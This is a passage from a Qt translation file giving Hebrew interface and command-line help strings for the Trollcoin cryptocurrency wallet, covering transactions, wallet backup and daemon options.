<location line="+30"/>
<source>Debit</source>
<translation>חיוב</translation>
</message>
<message>
<location line="-39"/>
<source>Transaction fee</source>
<translation>עמלת פעולה</translation>
</message>
<message>
<location line="+16"/>
<source>Net amount</source>
<translation>כמות נקיה</translation>
</message>
<message>
<location line="+6"/>
<source>Message</source>
<translation>הודעה</translation>
</message>
<message>
<location line="+2"/>
<source>Comment</source>
<translation>הערה</translation>
</message>
<message>
<location line="+2"/>
<source>Transaction ID</source>
<translation>זיהוי פעולה</translation>
</message>
<message>
<location line="+3"/>
<source>Generated coins must mature 120 blocks before they can be spent. When you generated this block, it was broadcast to the network to be added to the block chain. If it fails to get into the chain, its state will change to "not accepted" and it won't be spendable. This may occasionally happen if another node generates a block within a few seconds of yours.</source>
<translation>מטבעות שנוצרים חייבים להבשיל למשך 120 בלוקים לפני שניתן לנצל אותם. כשיצרת את הבלוק הזה, הוא הופץ לרשת כדי להתווסף לשרשרת הבלוקים. אם הוא אינו מצליח לביע לשרשרת, המצב שלו ישתנה ל"לא התקבל" ולא ניתן יהיה לנצל אותו. זה עשוי לקרות מעת לעת אם צומת אחר יוצר בלוק בטווח של מספר שניות מהבלוק שלך.</translation>
</message>
<message>
<location line="+7"/>
<source>Debug information</source>
<translation>מידע ניפוי</translation>
</message>
<message>
<location line="+8"/>
<source>Transaction</source>
<translation>פעולה</translation>
</message>
<message>
<location line="+3"/>
<source>Inputs</source>
<translation>קלטים</translation>
</message>
<message>
<location line="+23"/>
<source>Amount</source>
<translation>כמות</translation>
</message>
<message>
<location line="+1"/>
<source>true</source>
<translation>אמת</translation>
</message>
<message>
<location line="+0"/>
<source>false</source>
<translation>שקר</translation>
</message>
<message>
<location line="-209"/>
<source>, has not been successfully broadcast yet</source>
<translation>, טרם שודר בהצלחה</translation>
</message>
<message numerus="yes">
<location line="-35"/>
<source>Open for %n more block(s)</source>
<translation><numerusform>פתח למשך בלוק %n יותר</numerusform><numerusform>פתח למשך %n בלוקים נוספים</numerusform></translation>
</message>
<message>
<location line="+70"/>
<source>unknown</source>
<translation>לא ידוע</translation>
</message>
</context>
<context>
<name>TransactionDescDialog</name>
<message>
<location filename="../forms/transactiondescdialog.ui" line="+14"/>
<source>Transaction details</source>
<translation>פרטי הפעולה</translation>
</message>
<message>
<location line="+6"/>
<source>This pane shows a detailed description of the transaction</source>
<translation>חלונית זו מציגה תיאור מפורט של הפעולה</translation>
</message>
</context>
<context>
<name>TransactionTableModel</name>
<message>
<location filename="../transactiontablemodel.cpp" line="+225"/>
<source>Date</source>
<translation>תאריך</translation>
</message>
<message>
<location line="+0"/>
<source>Type</source>
<translation>סוג</translation>
</message>
<message>
<location line="+0"/>
<source>Address</source>
<translation>כתובת</translation>
</message>
<message>
<location line="+0"/>
<source>Amount</source>
<translation>כמות</translation>
</message>
<message numerus="yes">
<location line="+57"/>
<source>Open for %n more block(s)</source>
<translation><numerusform>פתח למשך בלוק %n יותר</numerusform><numerusform>פתח למשך %n בלוקים נוספים</numerusform></translation>
</message>
<message>
<location line="+3"/>
<source>Open until %1</source>
<translation>פתוח עד %1</translation>
</message>
<message>
<location line="+3"/>
<source>Offline (%1 confirmations)</source>
<translation>לא מחובר (%1 אישורים)</translation>
</message>
<message>
<location line="+3"/>
<source>Unconfirmed (%1 of %2 confirmations)</source>
<translation>ממתין לאישור (%1 מתוך %2 אישורים)</translation>
</message>
<message>
<location line="+3"/>
<source>Confirmed (%1 confirmations)</source>
<translation>מאושר (%1 אישורים)</translation>
</message>
<message numerus="yes">
<location line="+8"/>
<source>Mined balance will be available when it matures in %n more block(s)</source>
<translation><numerusform>המאזן שנכרה יהיה זמין כשהוא מבשיל בעוד בלוק אחד</numerusform><numerusform>המאזן שנכרה יהיה זמין כשהוא מבשיל בעוד %n בלוקים</numerusform></translation>
</message>
<message>
<location line="+5"/>
<source>This block was not received by any other nodes and will probably not be accepted!</source>
<translation>הבלוק הזה לא נקלט על ידי אף צומת אחר, וכנראה לא יתקבל!</translation>
</message>
<message>
<location line="+3"/>
<source>Generated but not accepted</source>
<translation>נוצר אך לא התקבל</translation>
</message>
<message>
<location line="+43"/>
<source>Received with</source>
<translation>התקבל עם</translation>
</message>
<message>
<location line="+2"/>
<source>Received from</source>
<translation>התקבל מאת</translation>
</message>
<message>
<location line="+3"/>
<source>Sent to</source>
<translation>נשלח ל</translation>
</message>
<message>
<location line="+2"/>
<source>Payment to yourself</source>
<translation>תשלום לעצמך</translation>
</message>
<message>
<location line="+2"/>
<source>Mined</source>
<translation>נכרה</translation>
</message>
<message>
<location line="+38"/>
<source>(n/a)</source>
<translation>(n/a)</translation>
</message>
<message>
<location line="+199"/>
<source>Transaction status. Hover over this field to show number of confirmations.</source>
<translation>מצב הפעולה. השהה את הסמן מעל שדה זה כדי לראות את מספר האישורים.</translation>
</message>
<message>
<location line="+2"/>
<source>Date and time that the transaction was received.</source>
<translation>התאריך והשעה בה הפעולה הזאת התקבלה.</translation>
</message>
<message>
<location line="+2"/>
<source>Type of transaction.</source>
<translation>סוג הפעולה.</translation>
</message>
<message>
<location line="+2"/>
<source>Destination address of transaction.</source>
<translation>כתובת היעד של הפעולה.</translation>
</message>
<message>
<location line="+2"/>
<source>Amount removed from or added to balance.</source>
<translation>הכמות שהתווספה או הוסרה מהיתרה.</translation>
</message>
</context>
<context>
<name>TransactionView</name>
<message>
<location filename="../transactionview.cpp" line="+52"/>
<location line="+16"/>
<source>All</source>
<translation>הכל</translation>
</message>
<message>
<location line="-15"/>
<source>Today</source>
<translation>היום</translation>
</message>
<message>
<location line="+1"/>
<source>This week</source>
<translation>השבוע</translation>
</message>
<message>
<location line="+1"/>
<source>This month</source>
<translation>החודש</translation>
</message>
<message>
<location line="+1"/>
<source>Last month</source>
<translation>החודש שעבר</translation>
</message>
<message>
<location line="+1"/>
<source>This year</source>
<translation>השנה</translation>
</message>
<message>
<location line="+1"/>
<source>Range...</source>
<translation>טווח...</translation>
</message>
<message>
<location line="+11"/>
<source>Received with</source>
<translation>התקבל עם</translation>
</message>
<message>
<location line="+2"/>
<source>Sent to</source>
<translation>נשלח ל</translation>
</message>
<message>
<location line="+2"/>
<source>To yourself</source>
<translation>לעצמך</translation>
</message>
<message>
<location line="+1"/>
<source>Mined</source>
<translation>נכרה</translation>
</message>
<message>
<location line="+1"/>
<source>Other</source>
<translation>אחר</translation>
</message>
<message>
<location line="+7"/>
<source>Enter address or label to search</source>
<translation>הכנס כתובת או תוית לחפש</translation>
</message>
<message>
<location line="+7"/>
<source>Min amount</source>
<translation>כמות מזערית</translation>
</message>
<message>
<location line="+34"/>
<source>Copy address</source>
<translation>העתק כתובת</translation>
</message>
<message>
<location line="+1"/>
<source>Copy label</source>
<translation>העתק תוית</translation>
</message>
<message>
<location line="+1"/>
<source>Copy amount</source>
<translation>העתק כמות</translation>
</message>
<message>
<location line="+1"/>
<source>Copy transaction ID</source>
<translation>העתק מזהה פעולה</translation>
</message>
<message>
<location line="+1"/>
<source>Edit label</source>
<translation>ערוך תוית</translation>
</message>
<message>
<location line="+1"/>
<source>Show transaction details</source>
<translation>הצג פרטי פעולה</translation>
</message>
<message>
<location line="+139"/>
<source>Export Transaction Data</source>
<translation>יצוא נתוני פעולות</translation>
</message>
<message>
<location line="+1"/>
<source>Comma separated file (*.csv)</source>
<translation>קובץ מופרד בפסיקים (*.csv)</translation>
</message>
<message>
<location line="+8"/>
<source>Confirmed</source>
<translation>מאושר</translation>
</message>
<message>
<location line="+1"/>
<source>Date</source>
<translation>תאריך</translation>
</message>
<message>
<location line="+1"/>
<source>Type</source>
<translation>סוג</translation>
</message>
<message>
<location line="+1"/>
<source>Label</source>
<translation>תוית</translation>
</message>
<message>
<location line="+1"/>
<source>Address</source>
<translation>כתובת</translation>
</message>
<message>
<location line="+1"/>
<source>Amount</source>
<translation>כמות</translation>
</message>
<message>
<location line="+1"/>
<source>ID</source>
<translation>מזהה</translation>
</message>
<message>
<location line="+4"/>
<source>Error exporting</source>
<translation>שגיאה ביצוא</translation>
</message>
<message>
<location line="+0"/>
<source>Could not write to file %1.</source>
<translation>לא מסוגל לכתוב לקובץ %1.</translation>
</message>
<message>
<location line="+100"/>
<source>Range:</source>
<translation>טווח:</translation>
</message>
<message>
<location line="+8"/>
<source>to</source>
<translation>אל</translation>
</message>
</context>
<context>
<name>WalletModel</name>
<message>
<location filename="../walletmodel.cpp" line="+193"/>
<source>Send Coins</source>
<translation>שלח מטבעות</translation>
</message>
</context>
<context>
<name>WalletView</name>
<message>
<location filename="../walletview.cpp" line="+42"/>
<source>&Export</source>
<translation type="unfinished"/>
</message>
<message>
<location line="+1"/>
<source>Export the data in the current tab to a file</source>
<translation>יצוא הנתונים בטאב הנוכחי לקובץ</translation>
</message>
<message>
<location line="+193"/>
<source>Backup Wallet</source>
<translation>גבה ארנק</translation>
</message>
<message>
<location line="+0"/>
<source>Wallet Data (*.dat)</source>
<translation>נתוני ארנק (*.dat)</translation>
</message>
<message>
<location line="+3"/>
<source>Backup Failed</source>
<translation>גיבוי נכשל</translation>
</message>
<message>
<location line="+0"/>
<source>There was an error trying to save the wallet data to the new location.</source>
<translation>הייתה שגיאה בנסיון לשמור את המידע הארנק למיקום החדש.</translation>
</message>
<message>
<location line="+4"/>
<source>Backup Successful</source>
<translation>גיבוי הושלם בהצלחה</translation>
</message>
<message>
<location line="+0"/>
<source>The wallet data was successfully saved to the new location.</source>
<translation>נתוני הארנק נשמרו בהצלחה במקום החדש.</translation>
</message>
</context>
<context>
<name>bitcoin-core</name>
<message>
<location filename="../bitcoinstrings.cpp" line="+94"/>
<source>Trollcoin version</source>
<translation>גרסת לייטקוין</translation>
</message>
<message>
<location line="+102"/>
<source>Usage:</source>
<translation>שימוש:</translation>
</message>
<message>
<location line="-29"/>
<source>Send command to -server or trollcoind</source>
<translation>שלח פקודה ל -server או trollcoind</translation>
</message>
<message>
<location line="-23"/>
<source>List commands</source>
<translation>רשימת פקודות</translation>
</message>
<message>
<location line="-12"/>
<source>Get help for a command</source>
<translation>קבל עזרה עבור פקודה</translation>
</message>
<message>
<location line="+24"/>
<source>Options:</source>
<translation>אפשרויות:</translation>
</message>
<message>
<location line="+24"/>
<source>Specify configuration file (default: trollcoin.conf)</source>
<translation>ציין קובץ הגדרות (ברירת מחדל: trollcoin.conf)</translation>
</message>
<message>
<location line="+3"/>
<source>Specify pid file (default: trollcoind.pid)</source>
<translation>ציין קובץ pid (ברירת מחדל: trollcoind.pid)</translation>
</message>
<message>
<location line="-1"/>
<source>Specify data directory</source>
<translation>ציין תיקיית נתונים</translation>
</message>
<message>
<location line="-9"/>
<source>Set database cache size in megabytes (default: 25)</source>
<translation>קבע את גודל המטמון של מסד הנתונים במגהבייט (ברירת מחדל: 25)</translation>
</message>
<message>
<location line="-28"/>
<source>Listen for connections on <port> (default: 9333 or testnet: 19333)</source>
<translation>האזן לחיבורים ב<פורט> (ברירת מחדל: 9333 או ברשת הבדיקה: 19333)</translation>
</message>
<message>
<location line="+5"/>
<source>Maintain at most <n> connections to peers (default: 125)</source>
<translation>החזק לכל היותר <n> חיבורים לעמיתים (ברירת מחדל: 125)</translation>
</message>
<message>
<location line="-48"/>
<source>Connect to a node to retrieve peer addresses, and disconnect</source>
<translation>התחבר לצומת כדי לדלות כתובות עמיתים, ואז התנתק</translation>
</message>
<message>
<location line="+82"/>
<source>Specify your own public address</source>
<translation>ציין את הכתובת הפומבית שלך</translation>
</message>
<message>
<location line="+3"/>
<source>Threshold for disconnecting misbehaving peers (default: 100)</source>
<translation>סף להתנתקות מעמיתים הנוהגים שלא כהלכה (ברירת מחדל: 100)</translation>
</message>
<message>
<location line="-134"/>
<source>Number of seconds to keep misbehaving peers from reconnecting (default: 86400)</source>
<translation>מספר שניות למנוע מעמיתים הנוהגים שלא כהלכה מלהתחבר מחדש (ברירת מחדל: 86400)</translation>
</message>
<message>
<location line="-29"/>
<source>An error occurred while setting up the RPC port %u for listening on IPv4: %s</source>
<translation>אירעה שגיאה בעת הגדרת פורט RPC %u להאזנה ב-IPv4: %s</translation>
</message>
<message>
<location line="+27"/>
<source>Listen for JSON-RPC connections on <port> (default: 9332 or testnet: 19332)</source>
<translation>האזן לחיבורי JSON-RPC ב- <port> (ברירת מחדל: 9332 או רשת בדיקה: 19332)</translation>
</message>
<message>
<location line="+37"/>
<source>Accept command line and JSON-RPC commands</source>
<translation>קבל פקודות משורת הפקודה ו- JSON-RPC</translation>
</message>
<message>
<location line="+76"/>
<source>Run in the background as a daemon and accept commands</source>
<translation>רוץ ברקע כדימון וקבל פקודות</translation>
</message>
<message>
<location line="+37"/>
<source>Use the test network</source>
<translation>השתמש ברשת הבדיקה</translation>
</message>
<message>
<location line="-112"/>
<source>Accept connections from outside (default: 1 if no -proxy or -connect)</source>
<translation>קבל חיבורים מבחוץ (ברירת מחדל: 1 ללא -proxy או -connect)</translation>
</message>
<message>
<location line="-80"/>
<source>%s, you must set a rpcpassword in the configuration file:
%s
It is recommended you use the following random password:
rpcuser=trollcoinrpc
rpcpassword=%s
(you do not need to remember this password)
The username and password MUST NOT be the same.
If the file does not exist, create it with owner-readable-only file permissions.
It is also recommended to set alertnotify so you are notified of problems;
for example: alertnotify=echo %%s | mail -s "Trollcoin Alert" admin@foo.com
</source>
<translation>%s, עליך לקבוע סיסמת RPC בקובץ הקונפיגורציה:
%s
מומלץ להשתמש בסיסמא האקראית הבאה:
rpcuser=trollcoinrpc
rpcpassword=%s
(אין צורך לזכור את הסיסמה)
אסור ששם המשתמש והסיסמא יהיו זהים.
אם הקובץ אינו קיים, צור אותו עם הרשאות קריאה לבעלים בלבד.
זה מומלץ לסמן alertnotify כדי לקבל דיווח על תקלות;
למשל: alertnotify=echo %%s | mail -s "Trollcoin Alert" admin@foo.com
</translation>
</message>
<message>
<location line="+17"/>
<source>An error occurred while setting up the RPC port %u for listening on IPv6, falling back to IPv4: %s</source>
<translation>אירעה שגיאה בעת הגדרת פורט RPC %u להאזנה ב-IPv6, נסוג ל-IPv4: %s</translation>
</message>
<message>
<location line="+3"/>
<source>Bind to given address and always listen on it. Use [host]:port notation for IPv6</source>
<translation>קשור עם כתובת נתונה והאזן לה תמיד. השתמש בסימון [host]:port עבוד IPv6.</translation>
</message>
<message>
<location line="+3"/>
<source>Cannot obtain a lock on data directory %s. Trollcoin is probably already running.</source>
<translation>לא מסוגל להשיג נעילה על תיקיית הנתונים %s. כנראה שלייטקוין כבר רץ.</translation>
</message>
<message>
<location line="+3"/>
<source>Error: The transaction was rejected! This might happen if some of the coins in your wallet were already spent, such as if you used a copy of wallet.dat and coins were spent in the copy but not marked as spent here.</source>
<translation>שגיאה: הפעולה נדחתה! זה עלול לקרות אם כמה מהמטבעות בארנק שלך כבר נוצלו, למשל אם השתמשת בעותק של wallet.dat ומטבעות נשלחו בעותק אך לא סומנו כמנוצלות כאן.</translation>
</message>
<message>
<location line="+4"/>
<source>Error: This transaction requires a transaction fee of at least %s because of its amount, complexity, or use of recently received funds!</source>
<translation>שגיאה: הפעולה הזאת דורשת עמלת פעולה של לפחות %s עקב הכמות, המורכבות, או השימוש בכספים שהתקבלו לאחרונה!</translation>
</message>
<message>
<location line="+3"/>
<source>Execute command when a relevant alert is received (%s in cmd is replaced by message)</source>
<translation>בצע פעולה כאשר ההודעה הרלוונטית מתקבלת(%s בשורת הפקודה משתנה על-ידי ההודעה)</translation>
</message>
<message>
<location line="+3"/>
<source>Execute command when a wallet transaction changes (%s in cmd is replaced by TxID)</source>
<translation>בצע פקודה כאשר פעולת ארנק משתנה (%s ב cmd יוחלף ב TxID)</translation>
</message>
<message>
<location line="+11"/>
<source>Set maximum size of high-priority/low-fee transactions in bytes (default: 27000)</source>
<translation>קבע גודל מקסימלי עבור פעולות עדיפות גבוהה/עמלה נמוכה בבתים (ברירת מחדל: 27000)</translation>
</message>
<message>
<location line="+6"/>
<source>This is a pre-release test build - use at your own risk - do not use for mining or merchant applications</source>
<translation>זוהי בניית ניסיון טרום-שחרור - השימוש בה על אחריותך - אין להשתמש לצורך כריה או יישומי מסחר</translation>
</message>
<message>
<location line="+5"/>
<source>Warning: -paytxfee is set very high! This is the transaction fee you will pay if you send a transaction.</source>
<translation>אזהרה: -paytxfee נקבע לערך מאד גבוה! זוהי עמלת הפעולה שתשלם אם אתה שולח פעולה.</translation>
</message>
<message>
<location line="+3"/>
<source>Warning: Displayed transactions may not be correct! You may need to upgrade, or other nodes may need to upgrade.</source>
<translation>אזהרה: הפעולות המוצגות עשויות לא להיות נכונות! ייתכן ואתה צריך לשדרג, או שצמתים אחרים צריכים לשדרג.</translation>
</message>
<message>
<location line="+3"/>
<source>Warning: Please check that your computer's date and time are correct! If your clock is wrong Trollcoin will not work properly.</source>
<translation>אזהרה: אנא בדוק שהתאריך והשעה של המחשב שלך נכונים! אם השעון שלך אינו נכון לייטקוין לא יעבוד כראוי.</translation>
</message>
<message>
<location line="+3"/>
<source>Warning: error reading wallet.dat! All keys read correctly, but transaction data or address book entries might be missing or incorrect.</source>
<translation>אזהרה: שגיאה בקריאת wallet.dat! כל המתפחות נקראו באופן תקין, אך נתוני הפעולות או ספר הכתובות עלולים להיות חסרים או שגויים.</translation>
</message>
<message>
<location line="+3"/>
<source>Warning: wallet.dat corrupt, data salvaged! Original wallet.dat saved as wallet.{timestamp}.bak in %s; if your balance or transactions are incorrect you should restore from a backup.</source>
<translation>אזהרה: קובץ wallet.dat מושחת, המידע חולץ! קובץ wallet.dat המקורח נשמר כ - wallet.{timestamp}.bak ב - %s; אם המאזן או הפעולות שגויים עליך לשחזר גיבוי.</translation>
</message>
<message>
<location line="+14"/>
<source>Attempt to recover private keys from a corrupt wallet.dat</source>
<translation>נסה לשחזר מפתחות פרטיים מקובץ wallet.dat מושחת.</translation>
</message>
<message>
<location line="+2"/>
<source>Block creation options:</source>
<translation>אפשרויות יצירת בלוק:</translation>
</message>
<message>
<location line="+5"/>
<source>Connect only to the specified node(s)</source>
<translation>התחבר רק לצמתים המצוינים</translation>
</message>
<message>
<location line="+3"/>
<source>Corrupted block database detected</source>
<translation>התגלה מסד נתוני בלוקים לא תקין</translation>
</message>
<message>
<location line="+1"/>
<source>Discover own IP address (default: 1 when listening and no -externalip)</source>
<translation>גלה את כתובת ה-IP העצמית (ברירת מחדל: 1 כשמאזינים וללא -externalip)</translation>
</message>
<message>
<location line="+1"/>
<source>Do you want to rebuild the block database now?</source>
<translation>האם תרצה כעט לבנות מחדש את מסד נתוני הבלוקים?</translation>
</message>
<message>
<location line="+2"/>
<source>Error initializing block database</source>
<translation>שגיאה באתחול מסד נתוני הבלוקים</translation>
</message>
<message>
<location line="+1"/>
<source>Error initializing wallet database environment %s!</source>
<translation>שגיאה באתחול סביבת מסד נתוני הארנקים %s!</translation>
</message>
<message>
<location line="+1"/>
<source>Error loading block database</source>
<translation>שגיאה בטעינת מסד נתוני הבלוקים</translation>
</message>
<message>
<location line="+4"/>
<source>Error opening block database</source>
<translation>שגיאה בטעינת מסד נתוני הבלוקים</translation>
</message>
<message>
<location line="+2"/>
<source>Error: Disk space is low!</source>
<translation>שגיאה: מעט מקום פנוי בדיסק!</translation>
</message>
<message>
<location line="+1"/>
<source>Error: Wallet locked, unable to create transaction!</source>
<translation>שגיאה: הארנק נעול, אין אפשרות ליצור פעולה!</translation>
</message>
<message>
<location line="+1"/>
<source>Error: system error: </source>
<translation>שגיאה: שגיאת מערכת:</translation>
</message>
<message>
<location line="+1"/>
<source>Failed to listen on any port. Use -listen=0 if you want this.</source>
<translation>האזנה נכשלה בכל פורט. השתמש ב- -listen=0 אם ברצונך בכך.</translation>
</message>
<message>
<location line="+1"/>
<source>Failed to read block info</source>
<translation>קריאת מידע הבלוקים נכשלה</translation>
</message>
<message>
<location line="+1"/>
<source>Failed to read block</source>
<translation>קריאת הבלוק נכשלה</translation>
</message>
<message>
<location line="+1"/>
<source>Failed to sync block index</source>
<translation>סנכרון אינדקס הבלוקים נכשל</translation>
</message>
<message>
<location line="+1"/>
<source>Failed to write block index</source>
<translation>כתיבת אינדקס הבלוקים נכשל</translation>
</message>
<message>
<location line="+1"/>
<source>Failed to write block info</source>
<translation>כתיבת מידע הבלוקים נכשל</translation>
</message>
<message>
<location line="+1"/>
<source>Failed to write block</source>
<translation>כתיבת הבלוק נכשלה</translation>
</message>
<message>
<location line="+1"/>
<source>Failed to write file info</source>
<translation>כתיבת מידע הקבצים נכשלה</translation>
</message>
<message>
<location line="+1"/>
<source>Failed to write to coin database</source>
<translation>כתיבת מסד נתוני המטבעות נכשלה</translation>
</message>
<message>
<location line="+1"/>
<source>Failed to write transaction index</source>
<translation>כתיבת אינדקס הפעולות נכשלה</translation>
</message>
<message>
<location line="+1"/>
<source>Failed to write undo data</source>
<translation>כתיבת נתוני ביטול נכשלה</translation>
</message>
<message>
<location line="+2"/>
<source>Find peers using DNS lookup (default: 1 unless -connect)</source>
<translation>מצא עמיתים ע"י חיפוש DNS (ברירת מחדל: 1 ללא -connect)</translation>
</message>
<message>
<location line="+1"/>
<source>Generate coins (default: 0)</source>
<translation type="unfinished"/>
</message>
<message>
<location line="+2"/>
<source>How many blocks to check at startup (default: 288, 0 = all)</source>
<translation>מספר הבלוקים לבדוק בעת אתחול (ברירת מחדל: 288, 0 = כולם)</translation>
</message>
<message>
<location line="+1"/>
<source>How thorough the block verification is (0-4, default: 3)</source>
<translation>מידת היסודיות של אימות הבלוקים (0-4, ברירת מחדל: 3)</translation>
</message>
<message>
<location line="+19"/>
<source>Not enough file descriptors available.</source>
<translation type="unfinished"/>
</message>
<message>
<location line="+8"/>
<source>Rebuild block chain index from current blk000??.dat files</source>
<translation>בנה מחדש את אינדק שרשרת הבלוקים מקבצי ה-blk000??.dat הנוכחיים.</translation>
</message>
<message>
<location line="+16"/>
<source>Set the number of threads to service RPC calls (default: 4)</source>
<translation>קבע את מספר תהליכוני לשירות קריאות RPC (ברירת מחדל: 4)</translation>
</message>
<message>
<location line="+26"/>
<source>Verifying blocks...</source>
<translation>מאמת את שלמות מסד הנתונים...</translation>
</message>
<message>
<location line="+1"/>
<source>Verifying wallet...</source>
<translation>מאמת את יושרת הארנק...</translation>
</message>
<message>
<location line="-69"/>
<source>Imports blocks from external blk000??.dat file</source>
<translation>מייבא בלוקים מקובצי blk000??.dat חיצוניים</translation>
</message>
<message>
<location line="-76"/>
<source>Set the number of script verification threads (up to 16, 0 = auto, <0 = leave that many cores free, default: 0)</source>
<translation type="unfinished"/>
</message>
<message>
<location line="+77"/>
<source>Information</source>
<translation>מידע</translation>
</message>
<message>
<location line="+3"/>
<source>Invalid -tor address: '%s'</source>
<translation>כתובת לא תקינה ל -tor: '%s'</translation>
</message>
<message>
<location line="+1"/>
<source>Invalid amount for -minrelaytxfee=<amount>: '%s'</source>
<translation type="unfinished"/>
</message>
<message>
<location line="+1"/>
<source>Invalid amount for -mintxfee=<amount>: '%s'</source>
<translation type="unfinished"/>
</message>
<message>
<location line="+8"/>
<source>Maintain a full transaction index (default: 0)</source>
<translation>תחזק אינדקס פעולות מלא (ברירת מחדל: 0)</translation>
</message>
<message>
<location line="+2"/>
<source>Maximum per-connection receive buffer, <n>*1000 bytes (default: 5000)</source>
<translation>חוצץ קבלה מירבי לכל חיבור, <n>*1000 בתים (ברירת מחדל: 5000)</translation>
</message>
<message>
<location line="+1"/>
<source>Maximum per-connection send buffer, <n>*1000 bytes (default: 1000)</source>
<translation>חוצץ שליחה מירבי לכל חיבור, <n>*1000 בתים (ברירת מחדל: 1000)</translation>
</message>
<message>
<location line="+2"/>
<source>Only accept block chain matching built-in checkpoints (default: 1)</source>
<translation>קבל רק שרשרת בלוקים התואמת נקודות ביקורת מובנות (ברירת מחדל: 1)</translation>
</message>
<message>
<location line="+1"/>
<source>Only connect to nodes in network <net> (IPv4, IPv6 or Tor)</source>
<translation>התחבר רק לצמתים ברשת <net> (IPv4, IPv6 או Tor)</translation>
</message>
<message>
<location line="+2"/>
<source>Output extra debugging information. Implies all other -debug* options</source>
<translation>פלוט מידע ניפוי נוסף. נובע מכך כל אפשרויות -debug* האחרות.</translation>
</message>
<message>
<location line="+1"/>
<source>Output extra network debugging information</source>
<translation>פלוט מידע נוסף לניפוי שגיאות ברשת.</translation>
</message>
<message>
<location line="+2"/>
<source>Prepend debug output with timestamp</source>
<translation>הוסף חותמת זמן לפני פלט דיבאג</translation>
</message>
<message>
<location line="+5"/>
<source>SSL options: (see the Trollcoin Wiki for SSL setup instructions)</source>
<translation>אפשרויות SSL: (ראה את הויקי של לייטקוין עבור הוראות הגדרת SSL)</translation>
</message>
<message>
<location line="+1"/>
<source>Select the version of socks proxy to use (4-5, default: 5)</source>
<translation>בחר את גרסת פרוקסי SOCKS להשתמש בה (4-5, ברירת מחדל: 5)</translation>
</message>
<message>
<location line="+3"/>
<source>Send trace/debug info to console instead of debug.log file</source>
<translation>שלח מידע דיבאג ועקבה לקונסולה במקום לקובץ debug.log</translation>
</message>
<message>
<location line="+1"/>
<source>Send trace/debug info to debugger</source>
<translation>שלח מידע דיבאג ועקבה לכלי דיבאג</translation>
</message>
<message>
<location line="+5"/>
<source>Set maximum block size in bytes (default: 250000)</source>
<translation>קבע את גדול הבלוק המירבי בבתים (ברירת מחדל: 250000)</translation>
</message>
<message>
<location line="+1"/>
<source>Set minimum block size in bytes (default: 0)</source>
<translation>קבע את גודל הבלוק המינימלי בבתים (ברירת מחדל: 0)</translation>
</message>
<message>
<location line="+2"/>
<source>Shrink debug.log file on client startup (default: 1 when no -debug)</source>
<translation>כווץ את קובץ debug.log בהפעלת הקליינט (ברירת מחדל: 1 ללא -debug)</translation>
</message>
<message>
<location line="+1"/>
<source>Signing transaction failed</source>
<translation type="unfinished"/>
</message>
<message>
<location line="+2"/>
<source>Specify connection timeout in milliseconds (default: 5000)</source>
<translation>ציין הגבלת זמן לחיבור במילישניות (ברירת מחדל: 5000)</translation>
</message>
<message>
<location line="+4"/>
<source>System error: </source>
<translation>שגיאת מערכת:</translation>
</message>
<message>
<location line="+4"/>
<source>Transaction amount too small</source>
<translation type="unfinished"/>
</message>
<message>
<location line="+1"/>
<source>Transaction amounts must be positive</source>
<translation type="unfinished"/>
</message>
<message>
<location line="+1"/>
<source>Transaction too large</source>
<translation type="unfinished"/>
</message>
<message>
<location line="+7"/>
<source>Use UPnP to map the listening port (default: 0)</source>
<translation>השתמש ב-UPnP כדי למפות את הפורט להאזנה (ברירת מחדל: 0)</translation>
</message>
<message>
<location line="+1"/>
<source>Use UPnP to map the listening port (default: 1 when listening)</source>
<translation>השתמש ב-UPnP כדי למפות את הפורט להאזנה (ברירת מחדל: 1 בעת האזנה)</translation>
</message>
<message>
<location line="+1"/>
<source>Use proxy to reach tor hidden services (default: same as -proxy)</source>
<translation>השתמש בפרוקסי כדי להגיע לשירותים חבויים ב-tor (ברירת מחדל: כמו ב- -proxy)</translation>
</message>
<message>
<location line="+2"/>
<source>Username for JSON-RPC connections</source>
<translation>שם משתמש לחיבורי JSON-RPC</translation>
</message>
<message>
<location line="+4"/>
<source>Warning</source>
<translation>אזהרה</translation>
</message>
<message>
<location line="+1"/>
<source>Warning: This version is obsolete, upgrade required!</source>
<translation>אזהרה: הגרסה הזאת מיושנת, יש צורך בשדרוג!</translation>
</message>
<message>
<location line="+1"/>
<source>You need to rebuild the databases using -reindex to change -txindex</source>
<translation>עליך לבנות מחדש את מסדי הנתונים תוך שימוש ב- -reindex על מנת לשנות את -txindex</translation>
</message>
<message>
<location line="+1"/>
<source>wallet.dat corrupt, salvage failed</source>
<translation>קובץ wallet.dat מושחת, החילוץ נכשל</translation>
</message>
<message>
<location line="-50"/>
<source>Password for JSON-RPC connections</source>
<translation>סיסמה לחיבורי JSON-RPC</translation>
</message>
<message>
<location line="-67"/>
<source>Allow JSON-RPC connections from specified IP address</source>
<translation>אפשר חיבורי JSON-RPC מכתובת האינטרנט המצוינת</translation>
</message>
<message>
<location line="+76"/>
<source>Send commands to node running on <ip> (default: 127.0.0.1)</source>
<translation>שלח פקודות לצומת ב-<ip> (ברירת מחדל: 127.0.0.1)</translation>
</message>
<message>
<location line="-120"/>
<source>Execute command when the best block changes (%s in cmd is replaced by block hash)</source>
<translation>בצע פקודה זו כשהבלוק הטוב ביותר משתנה (%s בפקודה יוחלף בגיבוב הבלוק)</translation>
</message>
<message>
<location line="+147"/>
<source>Upgrade wallet to latest format</source>
<translation>שדרג את הארנק לפורמט העדכני</translation>
</message>
<message>
<location line="-21"/>
<source>Set key pool size to <n> (default: 100)</source>
<translation>קבע את גודל המאגר ל -<n> (ברירת מחדל: 100)</translation>
</message>
<message>
<location line="-12"/>
<source>Rescan the block chain for missing wallet transactions</source>
<translation>סרוק מחדש את שרשרת הבלוקים למציאת פעולות חסרות בארנק</translation>
</message>
<message>
<location line="+35"/>
<source>Use OpenSSL (https) for JSON-RPC connections</source>
<translation>השתמש ב-OpenSSL (https( עבור חיבורי JSON-RPC</translation>
</message>
<message>
<location line="-26"/>
<source>Server certificate file (default: server.cert)</source>
<translation>קובץ תעודת שרת (ברירת מחדל: server.cert)</translation>
</message>
<message>
<location line="+1"/>
<source>Server private key (default: server.pem)</source>
<translation>מפתח פרטי של השרת (ברירת מחדל: server.pem)</translation>
</message>
<message>
<location line="-151"/>
<source>Acceptable ciphers (default: TLSv1+HIGH:!SSLv2:!aNULL:!eNULL:!AH:!3DES:@STRENGTH)</source>
<translation>צפנים קבילים (ברירת מחדל: TLSv1+HIGH:!SSLv2:!aNULL:!eNULL:!AH:!3DES:@STRENGTH)</translation>
</message>
<message>
<location line="+165"/>
<source>This help message</source>
<translation>הודעת העזרה הזו</translation>
</message>
<message>
<location line="+6"/>
